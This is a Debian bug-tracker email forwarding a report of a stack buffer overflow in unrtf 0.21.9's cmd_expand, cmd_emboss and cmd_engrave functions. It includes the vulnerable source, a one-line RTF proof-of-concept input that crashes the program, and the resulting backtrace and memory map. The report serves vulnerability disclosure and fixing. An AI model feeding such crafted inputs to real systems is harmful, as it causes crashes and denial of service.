Bug#849705: unrtf: Stack buffer overflow

[Willi Mann]

Hi Dave,
Hi Jean-Francois,

I got the following bug report, apparrently describing a buffer overflow
in unrtf - which I can reproduce. Do you have a suggestion for a fix?

I'm also CCing debian's security team.

WM

Am 2016-12-30 um 01:44 schrieb Skylake:
> Package: unrtf
> Version: 0.21.9-clean-2
> 
> I've found a Stack-based buffer overflow in unrtf 0.21.9, which affects three 
> functions including: cmd_expand, cmd_emboss and cmd_engrave.
> 
> # convert.c
> 
> static int
> cmd_expand (Word *w, int align, char has_param, int param) {
>      char str[10];
>      if (has_param) {
>          sprintf(str, "%d", param/4); // Overflow, 9-digit negative value 
> triggers the bug
>          if (!param)
>              attr_pop(ATTR_EXPAND);
>          else
>              attr_push(ATTR_EXPAND, str);
>      }
>      return FALSE;
> }
> 
> Apparently writing a negative integer to the buffer can trigger the overflow 
> (Minus sign needs an extra byte).
> 
> * How to trigger the bug *
> 
> $ echo "\expnd-400000000" > poc
> $ unrtf poc
> 
> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
> <html>
> <head>
> <meta http-equiv="content-type" content="text/html; charset=utf-8">
> <!-- Translation from RTF performed by UnRTF, version 0.21.9 -->
> *** buffer overflow detected ***: unrtf terminated
> ======= Backtrace: =========
> /lib/i386-linux-gnu/libc.so.6(+0x6737a)[0xb764f37a]
> /lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x37)[0xb76dfe07]
> /lib/i386-linux-gnu/libc.so.6(+0xf60a8)[0xb76de0a8]
> /lib/i386-linux-gnu/libc.so.6(+0xf58b8)[0xb76dd8b8]
> /lib/i386-linux-gnu/libc.so.6(_IO_default_xsputn+0xa6)[0xb7653bf6]
> /lib/i386-linux-gnu/libc.so.6(_IO_vfprintf+0xf66)[0xb762b1d6]
> /lib/i386-linux-gnu/libc.so.6(__vsprintf_chk+0x90)[0xb76dd950]
> /lib/i386-linux-gnu/libc.so.6(__sprintf_chk+0x20)[0xb76dd8a0]
> unrtf[0x804c7b8]
> unrtf[0x804f77d]
> unrtf[0x804f9e7]
> unrtf[0x804920b]
> /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7600276]
> unrtf[0x804953c]
> ======= Memory map: ========
> 08048000-0805b000 r-xp 00000000 08:01 405354     /usr/bin/unrtf
> 0805b000-0805c000 r--p 00012000 08:01 405354     /usr/bin/unrtf
> 0805c000-0805d000 rw-p 00013000 08:01 405354     /usr/bin/unrtf
> 0805d000-08085000 rw-p 00000000 00:00 0
> 0952d000-0954e000 rw-p 00000000 00:00 0          [heap]
> b75ca000-b75e6000 r-xp 00000000 08:01 393233     
> /usr/lib/i386-linux-gnu/libgcc_s.so.1
> b75e6000-b75e7000 r--p 0001b000 08:01 393233     
> /usr/lib/i386-linux-gnu/libgcc_s.so.1
> b75e7000-b75e8000 rw-p 0001c000 08:01 393233     
> /usr/lib/i386-linux-gnu/libgcc_s.so.1
> b75e8000-b7799000 r-xp 00000000 08:01 395818     
> /usr/lib/i386-linux-gnu/libc-2.24.so
> b7799000-b779b000 r--p 001b0000 08:01 395818     
> /usr/lib/i386-linux-gnu/libc-2.24.so
> b779b000-b779c000 rw-p 001b2000 08:01 395818     
> /usr/lib/i386-linux-gnu/libc-2.24.so
> b779c000-b779f000 rw-p 00000000 00:00 0
> b77a3000-b77a6000 rw-p 00000000 00:00 0
> b77a6000-b77a8000 r--p 00000000 00:00 0          [vvar]
> b77a8000-b77aa000 r-xp 00000000 00:00 0          [vdso]
> b77aa000-b77cc000 r-xp 00000000 08:01 393914     
> /usr/lib/i386-linux-gnu/ld-2.24.so
> b77cc000-b77cd000 rw-p 00000000 00:00 0
> b77cd000-b77ce000 r--p 00022000 08:01 393914     
> /usr/lib/i386-linux-gnu/ld-2.24.so
> b77ce000-b77cf000 rw-p 00023000 08:01 393914     
> /usr/lib/i386-linux-gnu/ld-2.24.so
> bf992000-bf9b3000 rw-p 00000000 00:00 0          [stack]
> Aborted
> 
> * Test environment *
> 
> Linux debian 4.7.0-1-686-pae #1 SMP Debian 4.7.8-1 (2016-10-19) i686 GNU/Linux
> libc6 2.24-8
> 
> Regards,
> Amir
> 
> Sent with ProtonMail <https://protonmail.com> Secure Email.
>